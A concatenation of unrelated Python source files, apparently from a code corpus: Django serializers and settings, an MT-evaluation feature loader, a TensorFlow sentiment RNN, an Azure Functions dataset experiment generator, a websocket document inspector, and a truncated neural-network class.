fields = ('id', 'location', 'time', 'dayOfWeek')
class TypeSerializer(serializers.ModelSerializer):
requirements = RequirementSerializer(many=True, read_only=True)
rules = RuleSerializer(many=True, read_only=True)
class Meta:
model = Type
fields = ('id', 'typeName', 'requirements', 'rules')
class AcolyteSerializer(serializers.ModelSerializer):
class Meta:
model = Acolyte
fields = ('id', 'firstName', 'lastName', 'extra', 'birthday', 'group', 'inactive')
class CreateRequirementClassificationSerializer(serializers.ModelSerializer):
class Meta:
model = Classification
fields = ('id',)
class PlanSerializer(serializers.ModelSerializer):
class Meta:
model = Plan
fields = ('id', 'dateFrom', 'dateTo', 'public')
class MassSerializer(serializers.ModelSerializer):
def create(self, validated_data):
plan = Plan.objects.get(pk=self.context['view'].kwargs['plan_pk'])
validated_data['plan'] = plan
return Mass.objects.create(**validated_data)
class Meta:
model = Mass
fields = ('id', 'time', 'extra', 'location', 'type', 'canceled')
class AcolyteMassSerializer(serializers.ModelSerializer):
class Meta:
model = MassAcolyteRole
fields = ('id', 'mass', 'role')
class MassAcolyteSerializer(serializers.ModelSerializer):
def create(self, validated_data):
mass = Mass.objects.get(pk=self.context['view'].kwargs['mass_pk'])
validated_data['mass'] = mass
return MassAcolyteRole.objects.create(**validated_data)
class Meta:
model = MassAcolyteRole
fields = ('id', 'acolyte', 'role')
write_only_fields = ('mass',)
class CurrentPlanAcolyteSerializer(serializers.ModelSerializer):
class Meta:
model = Acolyte
fields = ('firstName', 'lastName', 'extra',)
class AcolyteRoleSerializer(serializers.ModelSerializer):
role = serializers.SlugRelatedField(
many=False,
read_only=True,
slug_field='roleName'
)
acolyte = CurrentPlanAcolyteSerializer(many=False)
class Meta:
model = MassAcolyteRole
fields = ('role', 'acolyte')
class CurrentPlanSerializer(serializers.ModelSerializer):
acolytes = serializers.SerializerMethodField()
location = serializers.SlugRelatedField(
many=False,
read_only=True,
slug_field='locationName'
)
class Meta:
model = Mass
fields = ('time', 'extra', 'location', 'canceled', 'acolytes')
def get_acolytes(self, obj):
queryset = MassAcolyteRole.objects.filter(mass=obj)
return AcolyteRoleSerializer(queryset, many=True).data
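# Hedged usage note (not part of the original module): several create() methods
# above read nested URL kwargs ('group_pk', 'type_pk', 'plan_pk', 'mass_pk')
# from self.context['view'], so these serializers are meant to back nested
# routes such as /groups/<group_pk>/classifications/ or
# /plans/<plan_pk>/masses/<mass_pk>/acolytes/ (the exact paths depend on the
# project's router configuration).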
|
StarcoderdataPython
|
386878
|
"""
Django settings for hc project.
Generated by 'django-admin startproject' using Django 1.8.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
import logging
import os
import cssutils
import dj_database_url
cssutils.log.setLevel(logging.CRITICAL)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
HOST = os.environ.get("HOST", "localhost")
SECRET_KEY = os.environ.get("SECRET_KEY", "---")
DEBUG = os.environ.get("DEBUG", "t").lower().startswith("t")
ALLOWED_HOSTS = [HOST]
ALLOWED_DOMAIN = os.environ.get("ALLOWED_DOMAIN")
DEFAULT_FROM_EMAIL = os.environ.get(
'DEFAULT_FROM_EMAIL', '<EMAIL>')
USE_PAYMENTS = False
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.humanize',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'compressor',
'djmail',
'hc.accounts',
'hc.api',
'hc.front',
'hc.payments'
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.middleware.gzip.GZipMiddleware',
'hc.accounts.middleware.TeamAccessMiddleware',
)
AUTHENTICATION_BACKENDS = (
'hc.accounts.backends.EmailBackend',
'hc.accounts.backends.ProfileBackend'
)
ROOT_URLCONF = 'hc.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'hc.payments.context_processors.payments'
],
},
},
]
WSGI_APPLICATION = 'hc.wsgi.application'
TEST_RUNNER = 'hc.api.tests.CustomRunner'
# Default database engine is SQLite. So one can just check out code,
# install requirements.txt and do manage.py runserver and it works
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': './hc.sqlite',
}
}
if 'DATABASE_URL' in os.environ:
DATABASES['default'] = dj_database_url.config()
# You can switch database engine to postgres or mysql using environment
# variable 'DB'. Travis CI does this.
if os.environ.get("DB") == "postgres":
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'hc',
'USER': 'postgres',
'TEST': {'CHARSET': 'UTF8'}
}
}
if os.environ.get("DB") == "mysql":
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'USER': 'root',
'NAME': 'hc',
'TEST': {'CHARSET': 'UTF8'}
}
}
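# Hedged illustration (not part of the original settings): Travis CI switches
# engines by exporting DB before running the test suite, e.g.
#   DB=postgres python manage.py test
# (the value is read by the os.environ.get("DB") checks above).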
LANGUAGE_CODE = 'en-us'
TIME_ZONE = os.environ.get('TIME_ZONE', 'UTC')
USE_I18N = True
USE_L10N = True
USE_TZ = True
SESSION_ENGINE = "django.contrib.sessions.backends.signed_cookies"
PASSWORD_HASHERS = ('django.contrib.auth.hashers.MD5PasswordHasher',)
SITE_ROOT = os.environ.get("SITE_ROOT", "http://localhost:8000")
PING_ENDPOINT = SITE_ROOT + "/ping/"
PING_EMAIL_DOMAIN = HOST
STATIC_URL = '/static/'
STATICFILES_DIRS = [os.path.join(BASE_DIR, "static")]
STATIC_ROOT = os.path.join(BASE_DIR, 'static-collected')
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'compressor.finders.CompressorFinder',
)
COMPRESS_ENABLED = True
COMPRESS_OFFLINE = False
EMAIL_BACKEND = "djmail.backends.async.EmailBackend"
if 'POSTMARK_API_KEY' in os.environ:
POSTMARK_API_KEY = os.environ['POSTMARK_API_KEY']
POSTMARK_SENDER = DEFAULT_FROM_EMAIL
POSTMARK_TRACK_OPENS = True
DJMAIL_REAL_BACKEND = 'postmark.django_backend.EmailBackend'
# Pushover integration
PUSHOVER_API_TOKEN = None
PUSHOVER_SUBSCRIPTION_URL = None
PUSHOVER_EMERGENCY_RETRY_DELAY = 300
PUSHOVER_EMERGENCY_EXPIRATION = 86400
LOGGING = {
'version': 1,
'disable_existing_loggers': True,
'handlers': {
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler'
}
},
'loggers': {
'django': {
'handlers': ['console']
},
'djmail': {
'handlers': ['console']
},
'py.warnings': {
'handlers': ['console'],
'level': 'ERROR'
}
},
}
|
StarcoderdataPython
|
1919079
|
<reponame>alvations/USAAR-SemEval-2015
#!/usr/bin/env python -*- coding: utf-8 -*-
import io, os
from itertools import chain
import numpy as np
indir = 'Asiya-outputs/'
def get_asiya_scores():
feature_data = {}
for infile in os.listdir(indir):
if not infile.startswith('features'):
continue
if infile in ['features.cp', 'features.sr', 'features.ne',
'features.esa']:
continue
data = [[float(i) for i in line.strip().split()]
for line in io.open(indir+infile, 'r')]
feature_data[infile] = data
_seventy_seven = [i + j + k for i,j,k in
zip(feature_data['features.meteor'],
feature_data['features.sp'],
feature_data['features.ngram'])]
seventy_seven = []
to_remove = []
for i,j in enumerate(_seventy_seven):
if len(j) != 76:
to_remove.append(i)
else:
seventy_seven.append(j)
return seventy_seven, to_remove
def get_asiya_test_scores():
feature_data = {}
for infile in os.listdir(indir):
if not infile.startswith('features.test'):
continue
if infile not in ['features.test.meteor', 'features.test.sp',
'features.test.ngram']:
continue
data = [[float(i) for i in line.strip().split()]
for line in io.open(indir+infile, 'r')]
feature_data[infile] = data
_seventy_seven = [i + j + k for i,j,k in
zip(feature_data['features.test.meteor'],
feature_data['features.test.sp'],
feature_data['features.test.ngram'])]
return _seventy_seven
    # Unreachable debug check: the function returns above, so this loop never runs.
    for i,j in enumerate(_seventy_seven):
        print i, len(j), j
        assert len(j) == 76
#def get_asiya_scores_for_test():
'''
indir = 'Asiya-outputs/'
feature_data = {}
for infile in os.listdir(indir):
if not infile.startswith('report'):
continue
if infile not in ['report.test.meteor', 'report.test.sp',
'report.test.ngram']:
continue
for line in io.open(indir+infile, 'r'):
print infile, line.split()
break
data = [[float(i) for i in line.strip().split()]
for line in io.open(indir+infile, 'r')]
feature_data[infile] = data
for line in data:
print len(line), line
'''
|
StarcoderdataPython
|
5133925
|
from __future__ import division
import os
import time
from glob import glob
import tensorflow as tf
import numpy as np
from six.moves import xrange
import random
import utils
from ops import *
class SentimentRNN(object):
def __init__(self, sess, vocab_size, n_classes, batch_size,
keep_prob, max_length, n_recurrent_layers, n_fc_layers,
recurrent_layer_width, fc_layer_width, checkpoint_dir, epoch):
"""Inits variables, builds model"""
self.sess = sess
self.vocab_size = vocab_size
self.n_classes = n_classes
self.batch_size = batch_size
self.max_length = max_length
self.n_recurrent_layers = n_recurrent_layers
self.n_fc_layers = n_fc_layers
self.recurrent_layer_width = recurrent_layer_width
self.fc_layer_width = fc_layer_width
self.checkpoint_dir = checkpoint_dir
self.epoch = epoch
self.build_model()
def build_model(self):
"""Builds model and creates loss functions"""
# X is our input data, a tensor of sentences
# where each sentence is a list of 1-hot encodings of words
# will be like [[[0, 0, 1, 0...], [1, 0, 1, 0...]...],[...]]
self.X = tf.placeholder(tf.float32, [None, self.max_length, self.vocab_size])
# y is our labels
# will be like [[1, 0, 0], [0, 0, 1]]
self.y = tf.placeholder(tf.float32, [None, self.n_classes], name='y')
# Set up keep prob placeholder variable
self.keep_prob = tf.placeholder(tf.float32, name='keep_prob')
# logits is our predictions
# will be like [[1, 0, 0], [0, 0, 1]]
self.logits = self.rnn_simple_model(self.X, self.y)
# Construct loss function (mean of all cross-entropy losses)
self.loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(self.logits, self.y))
# self.loss = tf.reduce_mean(-tf.reduce_sum(self.y * tf.log(self.logits), reduction_indices=[1]))
self.loss_sum = tf.scalar_summary("loss", self.loss)
# Print trainable variables (useful for debugging)
print("Trainable Variables:", [var.name for var in tf.trainable_variables()])
self.t_vars =tf.trainable_variables()
self.saver = tf.train.Saver()
def train(self, config, X_train, y_train, X_test, y_test):
"""Train DeepPDF"""
train_step = tf.train.AdamOptimizer(config.learning_rate, beta1=config.beta1).minimize(self.loss)
correct_prediction = tf.equal(tf.argmax(self.logits,1), tf.argmax(self.y,1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
self.sess.run(tf.initialize_all_variables())
self.writer = tf.train.SummaryWriter("./logs", self.sess.graph)
counter = 1
start_time = time.time()
if self.load(self.checkpoint_dir):
print(" [*] Load SUCCESS")
else:
print(" [!] Load failed...")
for epoch in range(self.epoch):
all_minibatch_indices = utils.get_random_minibatch_indices(len(X_train), config.batch_size)
num_minibatches = len(all_minibatch_indices)
for minibatch_idx in range(num_minibatches):
minibatch_indices = all_minibatch_indices[minibatch_idx]
                batch_x, batch_y = np.zeros([config.batch_size] + list(X_train.shape[1:]), dtype='float32'), np.zeros([config.batch_size] + list(y_train.shape[1:]), dtype='float32')
batch_x = X_train[minibatch_indices,:,:]
batch_y = y_train[minibatch_indices,:]
# Update model weights
# train_step.run(feed_dict={self.X:batch_x, self.y:batch_y, self.keep_prob: config.keep_prob})
optimizer = tf.train.GradientDescentOptimizer(0.0002).minimize(self.loss)
# self.sess.run([train_step], feed_dict={self.X:batch_x, self.y:batch_y, self.keep_prob: config.keep_prob})
self.sess.run([optimizer], feed_dict={self.X:batch_x, self.y:batch_y, self.keep_prob: config.keep_prob})
batch_loss = self.sess.run(self.loss, feed_dict={self.X:batch_x, self.y:batch_y, self.keep_prob: 1.0})
tf.scalar_summary('batch_loss_cross_entropy', self.loss)
counter += 1
if np.mod(counter, 5) == 1:
print("Epoch: [%2d] [%4d/%4d] time: %4.4f, batch loss: %.8f" \
% (epoch, minibatch_idx, num_minibatches,
time.time() - start_time, batch_loss))
if np.mod(counter, 500) == 2:
self.save(config.checkpoint_dir, counter)
with tf.name_scope('accuracy-metrics'):
# Eval Accuracy after each epoch
test_accuracy = accuracy.eval(feed_dict={self.X: X_test, self.y: y_test, self.keep_prob: 1.0})
print("Epoch %d, testing accuracy %g"%(epoch, test_accuracy))
test_loss = self.loss.eval(feed_dict={self.X: X_test, self.y: y_test, self.keep_prob: 1.0})
print("Epoch %d, test loss %g"%(epoch, test_loss))
training_accuracy = accuracy.eval(feed_dict={self.X: X_train, self.y: y_train, self.keep_prob: 1.0})
print("Epoch %d, training accuracy %g"%(epoch, training_accuracy))
training_loss = self.loss.eval(feed_dict={self.X: X_train, self.y: y_train, self.keep_prob: 1.0})
print("Epoch %d, training loss %g"%(epoch, training_loss))
tf.scalar_summary('test_accuracy', test_accuracy)
tf.scalar_summary('test_loss', batch_loss)
tf.scalar_summary('training_accuracy', batch_loss)
tf.scalar_summary('training_loss', batch_loss)
tf.scalar_summary('accuracy-metrics', accuracy)
merged = tf.merge_all_summaries()
def rnn_simple_model(self, X, y):
"""Returns Model Graph"""
# print(X.get_shape())
with tf.name_scope("recurrent_layers") as scope:
# Create LSTM Cell
cell = tf.nn.rnn_cell.LSTMCell(self.recurrent_layer_width)
cell = tf.nn.rnn_cell.DropoutWrapper(
cell, output_keep_prob=self.keep_prob)
stacked_cells = tf.nn.rnn_cell.MultiRNNCell([cell] * self.n_recurrent_layers)
output, encoding = tf.nn.dynamic_rnn(stacked_cells, X, dtype=tf.float32)
with tf.name_scope("fc_layers") as scope:
# Connect RNN Embedding output into fully connected layers
            prev_layer = encoding
            for fc_index in range(0, self.n_fc_layers-1):
                # Feed each fully connected layer with the output of the previous one.
                prev_layer = lrelu(linear(prev_layer, self.fc_layer_width, 'fc{}'.format(fc_index)))
            fc_final = linear(prev_layer, self.n_classes, 'fc{}'.format(self.n_fc_layers-1))
return tf.nn.softmax(fc_final)
def save(self, checkpoint_dir, step):
"""Saves Model"""
model_name = "sentiment.model"
model_dir = "sentiment-%s" % (self.batch_size)
checkpoint_dir = os.path.join(checkpoint_dir, model_dir)
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
self.saver.save(self.sess,
os.path.join(checkpoint_dir, model_name),
global_step=step)
def load(self, checkpoint_dir):
"""Loads Model"""
print(" [*] Reading checkpoints...")
model_dir = "sentiment-%s" % (self.batch_size)
checkpoint_dir = os.path.join(checkpoint_dir, model_dir)
ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
if ckpt and ckpt.model_checkpoint_path:
ckpt_name = os.path.basename(ckpt.model_checkpoint_path)
self.saver.restore(self.sess, os.path.join(checkpoint_dir, ckpt_name))
return True
else:
return False
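if __name__ == '__main__':
    # Hedged usage sketch (not part of the original module); every hyperparameter
    # below is an illustrative placeholder.
    with tf.Session() as sess:
        model = SentimentRNN(sess, vocab_size=5000, n_classes=2, batch_size=32,
                             keep_prob=0.5, max_length=100, n_recurrent_layers=2,
                             n_fc_layers=2, recurrent_layer_width=128,
                             fc_layer_width=64, checkpoint_dir='./checkpoint',
                             epoch=10)
        # model.train(config, X_train, y_train, X_test, y_test) would then run
        # training, where config supplies learning_rate, beta1 and keep_prob, and
        # the arrays hold one-hot encoded sentences and one-hot labels.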
|
StarcoderdataPython
|
11383329
|
# Copyright 2021 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import json
import logging
import threading
import websockets
import send_receive_sync_helper
class DocumentInspector:
# Types of the documents to be inspected.
__GUI_DOC_TYPES = ['biDashboard', 'slide']
# Methods used in the sent messages.
__GET_DOCUMENT = 'GetDocument'
__GET_WIDGET_CONTAINER = 'GetWidgetContainer'
__GET_WIDGET_PROPERTIES = 'GetWidgetProperties'
def __init__(self, server_uri):
self.__server_uri = server_uri
self.__messages_counter = 0
self.__messages_counter_thread_lock = threading.Lock()
def get_widgets(self, doc_id, timeout=60):
"""Gets information from all graphical components that belong to a given document.
This method provides users a synchronized entry point, hiding the asynchronous processing
complexity from them.
Args:
doc_id: The document identifier.
timeout: Max seconds to wait.
Returns:
A ``list`` with the document's graphical components information.
"""
try:
return self.__run_until_complete(self.__get_widgets(doc_id, timeout))
except Exception:
logging.warning("error on get_widgets:", exc_info=True)
return []
@classmethod
def __run_until_complete(cls, future):
event_loop = asyncio.new_event_loop()
try:
return event_loop.run_until_complete(future)
except Exception:
            logging.info('Something went wrong while the workload was running.')
cls.__cancel_all_tasks(event_loop)
raise
finally:
event_loop.close()
async def __get_widgets(self, doc_id, timeout):
async with self.__connect_websocket() as websocket:
sync_helper = send_receive_sync_helper.SendReceiveSyncHelper()
await self.__start_get_widgets_workload(websocket, doc_id, sync_helper)
msg_sender = self.__send_get_widgets_messages
msg_receiver = self.__receive_get_widgets_messages
return await asyncio.wait_for(
self.__hold_websocket_communication(msg_sender(websocket, sync_helper),
msg_receiver(websocket, sync_helper)), timeout)
def __connect_websocket(self):
"""Opens a websocket connection.
Returns:
An awaiting function that yields a :class:`WebSocketClientProtocol` which can then be
used to send and receive messages.
"""
return websockets.connect(uri=self.__server_uri)
async def __start_get_widgets_workload(self, websocket, doc_id, sync_helper):
message_id = await self.__send_get_document_message(websocket, doc_id)
sync_helper.add_pending_reply_id(message_id, self.__GET_DOCUMENT)
@classmethod
async def __hold_websocket_communication(cls, msg_sender, msg_receiver):
"""Holds a websocket communication session until the awaitable message sender and receiver
are done.
Args:
msg_sender: A coroutine or future that sends messages.
msg_receiver: A coroutine or future that receives messages.
Returns:
The result of the receiver.
"""
results = await asyncio.gather(*[msg_sender, msg_receiver])
# The ``results`` list is expected to have two elements. The first one stores the result of
# the message sender and can be ignored. The second one stores the result of the receiver,
# which means the object to be returned on successful execution.
return results[1]
@classmethod
async def __receive_get_widgets_messages(cls, websocket, sync_helper):
results = []
async for message in websocket:
message_json = json.loads(message)
message_id = message_json.get('id')
if not message_id:
logging.info('Unhandled API message: %s', message)
continue
logging.debug('Reply received: %d', message_id)
if sync_helper.is_pending_reply(message_id, cls.__GET_WIDGET_PROPERTIES):
results.append(message_json['result'])
else:
sync_helper.add_unhandled_reply(message_json)
sync_helper.remove_pending_reply_id(message_id)
sync_helper.notify_new_reply()
return results
async def __send_get_widgets_messages(self, websocket, sync_helper):
while not sync_helper.were_all_replies_processed():
if not sync_helper.is_there_reply_notification():
await sync_helper.wait_for_replies()
sync_helper.clear_reply_notifications()
for reply in sync_helper.get_all_unhandled_replies():
await self.__send_follow_up_msg_get_widgets(websocket, sync_helper, reply)
# Closes the websocket when there are no more replies to be processed.
await websocket.close()
async def __send_follow_up_msg_get_widgets(self, websocket, sync_helper, reply):
message_id = reply.get('id')
if sync_helper.is_method(message_id, self.__GET_DOCUMENT):
await self.__handle_get_document_reply(websocket, sync_helper, reply)
sync_helper.remove_unhandled_reply(reply)
elif sync_helper.is_method(message_id, self.__GET_WIDGET_CONTAINER):
await self.__handle_get_widget_container_reply(websocket, sync_helper, reply)
sync_helper.remove_unhandled_reply(reply)
async def __send_get_document_message(self, websocket, doc_id):
"""Sends a Get Document message.
Returns:
The message id.
"""
message_id = self.__generate_message_id()
await websocket.send(
json.dumps({
'method': self.__GET_DOCUMENT,
'params': {
'id': doc_id
},
'id': message_id
}))
logging.debug('Get Document message sent: %d', message_id)
return message_id
async def __send_get_widget_container_message(self, websocket, container_id):
"""Sends a Get Widget Container message.
Returns:
The message id.
"""
message_id = self.__generate_message_id()
await websocket.send(
json.dumps({
'method': self.__GET_WIDGET_CONTAINER,
'params': {
'id': container_id,
},
'id': message_id,
}))
logging.debug('Get Widget Container message sent: %d', message_id)
return message_id
async def __send_get_widget_properties_message(self, websocket, widget_id):
"""Sends a Get Widget Properties message.
Returns:
The message id.
"""
message_id = self.__generate_message_id()
await websocket.send(
json.dumps({
'method': self.__GET_WIDGET_PROPERTIES,
'params': {
'id': widget_id,
},
'id': message_id,
}))
logging.debug('Get Widget Properties message sent: %d', message_id)
return message_id
async def __handle_get_document_reply(self, websocket, sync_helper, reply):
result = reply['result']
if not result['type'] in self.__GUI_DOC_TYPES:
return
container_ids = result['widgetContainerIds']
get_widget_container_msg_ids = await asyncio.gather(*[
self.__send_get_widget_container_message(websocket, container_id)
for container_id in container_ids
])
sync_helper.add_pending_reply_ids(get_widget_container_msg_ids,
self.__GET_WIDGET_CONTAINER)
async def __handle_get_widget_container_reply(self, websocket, sync_helper, reply):
widget_id = reply['result']['widgetId']
get_widget_properties_msg_id = \
await self.__send_get_widget_properties_message(websocket, widget_id)
sync_helper.add_pending_reply_id(get_widget_properties_msg_id,
self.__GET_WIDGET_PROPERTIES)
@classmethod
def __cancel_all_tasks(cls, event_loop):
logging.info('All tasks will be canceled...')
for task in asyncio.Task.all_tasks(loop=event_loop):
task.cancel()
def __generate_message_id(self):
with self.__messages_counter_thread_lock:
self.__messages_counter += 1
return self.__messages_counter
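if __name__ == '__main__':
    # Hedged usage sketch (not part of the original module); the websocket URI
    # and the document id below are placeholders.
    inspector = DocumentInspector('ws://localhost:9870/api')
    for widget in inspector.get_widgets('example-document-id', timeout=30):
        print(widget)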
|
StarcoderdataPython
|
11227242
|
import os
import glob
import pandas as pd
import tarfile
import urllib.request
from experimentgenerator.experiment_generator import ExperimentGenerator
from experimentgenerator.quantiled_cache import QuantiledCache
from autoscalingsim.utils.error_check import ErrorChecker
from autoscalingsim.utils.download_bar import DownloadProgressBar
@ExperimentGenerator.register('azurefunctions')
class AzureFunctionsExperimentGenerator(ExperimentGenerator):
"""
Generates the basic experiment configuration files based on the
Azure functions dataset published at ATC'20:
<NAME>, <NAME>, <NAME>, <NAME>, <NAME>,
<NAME>, <NAME>, <NAME>, <NAME>, & <NAME> (2020).
Serverless in the Wild: Characterizing and Optimizing the Serverless Workload at a Large Cloud Provider.
In 2020 USENIX Annual Technical Conference (USENIX ATC 20) (pp. 205–218). USENIX Association.
"""
dataset_link = 'https://azurecloudpublicdataset2.blob.core.windows.net/azurepublicdatasetv2/azurefunctions_dataset2019/azurefunctions-dataset2019.tar.xz'
filename_pattern_invocations = 'invocations_per_function_md.anon.d{}.csv'
filename_pattern_memory = 'app_memory_percentiles.anon.d{}.csv'
filename_pattern_duration = 'function_durations_percentiles.anon.d{}.csv'
@classmethod
def enrich_experiment_generation_recipe(cls, specialized_generator_config : dict, experiment_generation_recipe : dict):
data_path = ErrorChecker.key_check_and_load('data_path', specialized_generator_config)
download_dataset = True
if os.path.exists(data_path):
download_dataset = len(glob.glob(data_path + '/*.csv')) == 0
else:
os.makedirs(data_path)
if download_dataset:
print('Downloading the Azure functions archive...')
downloaded_data_archive = os.path.join(data_path, 'azurefunctions-dataset2019.tar.xz')
urllib.request.urlretrieve(cls.dataset_link, downloaded_data_archive, DownloadProgressBar())
print('Unpacking...')
with tarfile.open(downloaded_data_archive) as f:
f.extractall(data_path)
print('Removing the archive...')
os.remove(downloaded_data_archive)
quantiled_cache = QuantiledCache.load_or_create(data_path)
file_id_raw = ErrorChecker.key_check_and_load('file_id', specialized_generator_config)
file_id = cls._file_id_to_str(file_id_raw)
# Invocations
filename_invocations = os.path.join(data_path, cls.filename_pattern_invocations.format(file_id))
invocations_data_raw = pd.read_csv(filename_invocations)
invocations_data_http = invocations_data_raw[invocations_data_raw.Trigger == 'http']
invocations_data = pd.melt(invocations_data_http, id_vars = ['HashApp', 'HashFunction'], value_vars = invocations_data_http.columns[4:]).rename(columns = {'variable': 'datetime', 'value': 'invocations'})
invocations_data.datetime = pd.to_datetime(invocations_data.datetime, unit = 'm')
invocations_data.set_index(['HashApp', 'HashFunction', 'datetime'], inplace = True)
# Memory
filename_memory = os.path.join(data_path, cls.filename_pattern_memory.format(file_id))
memory_data = pd.read_csv(filename_memory).set_index(['HashOwner', 'HashApp'])
# Duration
filename_duration = os.path.join(data_path, cls.filename_pattern_duration.format(file_id))
duration_data = pd.read_csv(filename_duration).set_index(['HashOwner', 'HashApp', 'HashFunction'])
# Initializing generation parameters
invocations_quantiles_for_apps_filtering = ErrorChecker.key_check_and_load('consider_applications_with_invocations_quantiles', specialized_generator_config)
left_quantile_invocations = ErrorChecker.key_check_and_load('left_quantile', invocations_quantiles_for_apps_filtering)
right_quantile_invocations = ErrorChecker.key_check_and_load('right_quantile', invocations_quantiles_for_apps_filtering)
app_size_quantile = ErrorChecker.key_check_and_load('app_size_quantile_among_selected_based_on_invocations', specialized_generator_config)
apps_in_diapazone = quantiled_cache.update_and_get(left_quantile_invocations, right_quantile_invocations, invocations_data)
# TODO: below two lines take a lot of time to run -- think about optimizing/caching
invocations_data_selected = invocations_data.loc[list(apps_in_diapazone)]
#averaged_load_per_minute = invocations_data_selected.groupby(['datetime']).mean().round().astype({'invocations': 'int32'})
services_count = experiment_generation_recipe['application_recipe']['services'].get('services_count', None)
if services_count is None:
services_count = int(invocations_data_selected.reset_index().groupby(['HashApp'])['HashFunction'].nunique().quantile(app_size_quantile))
memory_data_aggregated = memory_data.groupby(['HashApp']).mean()
memory_data_selected = memory_data_aggregated.reindex(apps_in_diapazone).dropna()
memory_percentiles = memory_data_selected.mean()[2:] / services_count
# TODO: consider using information about the function? e.g. distribution over the functions
# we have to first select a function with its probabilities distribution...
duration_data_aggregated = duration_data.groupby(['HashApp']).mean()
duration_data_selected = duration_data_aggregated.reindex(apps_in_diapazone).dropna()
duration_percentiles = duration_data_selected.mean()[5:]
duration_percentiles_starts = [0] + list(duration_percentiles[:-1])
duration_percentiles_ends = list(duration_percentiles)
memory_percentiles_starts = [0] + list(memory_percentiles[:-1])
memory_percentiles_ends = list(memory_percentiles)
# Enriching the recipe
# TODO: consider empirical distribution
experiment_generation_recipe['application_recipe']['services']['services_count'] = services_count
experiment_generation_recipe['requests_recipe']['duration'] = { 'percentiles': { 'starts': duration_percentiles_starts, 'ends': duration_percentiles_ends},
'probabilities': [0.01, 0.24, 0.25, 0.25, 0.24, 0.01],
'unit': 'ms'}
# TODO: change according to the format in experiment generator and agree with the possible overwrite by other data analyzer
#experiment_generation_recipe['requests_recipe']['system_requirements']['memory'] = { 'percentiles': { 'starts': memory_percentiles_starts, 'ends': memory_percentiles_ends},
# 'probabilities': [0.01, 0.04, 0.20, 0.25, 0.25, 0.20, 0.04, 0.01],
# 'unit': 'MB'}
if experiment_generation_recipe['load_recipe']['load_kind'] == 'seasonal':
invocations_data_per_app = invocations_data.groupby(['HashApp', 'datetime']).max()
invocations_data_per_hour_per_app = invocations_data_per_app.groupby(['HashApp', pd.Grouper(freq='60T', level='datetime')]).sum().fillna(0).rename(columns = {'invocations': 'Load'})
invocations_data_per_hour = list(invocations_data_per_hour_per_app.groupby('datetime').mean().fillna(0)['Load'].astype(int))[:24]
experiment_generation_recipe['load_recipe']['pattern'] = {'type': 'values', 'params': [
{ 'month': 'all', 'day_of_week': 'all',
'values' : invocations_data_per_hour } ]}
@classmethod
def _file_id_to_str(cls, file_id : int):
return '0' + str(file_id) if file_id < 10 else str(file_id)
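if __name__ == '__main__':
    # Hedged usage sketch (not part of the original module): paths, quantiles and
    # the recipe skeleton are illustrative placeholders; on first run the recipe
    # enrichment downloads and unpacks the public Azure Functions archive into
    # data_path.
    generator_config = {
        'data_path': './azurefunctions-data',
        'file_id': 1,
        'consider_applications_with_invocations_quantiles': {
            'left_quantile': 0.25, 'right_quantile': 0.75},
        'app_size_quantile_among_selected_based_on_invocations': 0.5,
    }
    recipe = {'application_recipe': {'services': {}},
              'requests_recipe': {},
              'load_recipe': {'load_kind': 'seasonal'}}
    AzureFunctionsExperimentGenerator.enrich_experiment_generation_recipe(
        generator_config, recipe)
    print(recipe['application_recipe']['services']['services_count'])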
|
StarcoderdataPython
|
3336621
|
# Copyright 2017 <NAME>
import tensorflow as tf
from layers import InputLayer
from parameter import Parameter
class INeuralNetwork:
def get_input_layer(self, input_id):
pass
def set_input_layer(self, input_id, input_layer):
pass
def get_output_layer(self):
pass
def get_input_placeholder_layers(self):
pass
def compile(self, output):
pass
def is_compiled(self):
pass
def set_parameters(self, parameters):
pass
def get_parameters(self):
pass
def copy(self, new_name, reuse_parameters=False):
pass
def predict_batch(self, inputs):
pass
def predict(self, inputs):
pass
class NeuralNetwork(INeuralNetwork):
def __init__(self, name, session, input_dims):
self.name = name
self.session = session
self.input_dims = input_dims
self.layers = []
self.connections = []
self.parameters = []
self.input_layers = []
self.input_placeholder_layers = []
for input_id, input_dim in enumerate(input_dims):
input_layer = InputLayer(self.name + "_input_" + str(input_id), input_dim)
self.input_layers.append(input_layer)
self.input_placeholder_layers.append(input_layer)
self.is_training = tf.placeholder(tf.bool, name=(name + "_is_training"))
self.output_layer = None
self.output_dim = None
self.compiled = False
def get_input_layer(self, input_id):
return self.input_layers[input_id]
def set_input_layer(self, input_id, input_layer):
if self.compiled:
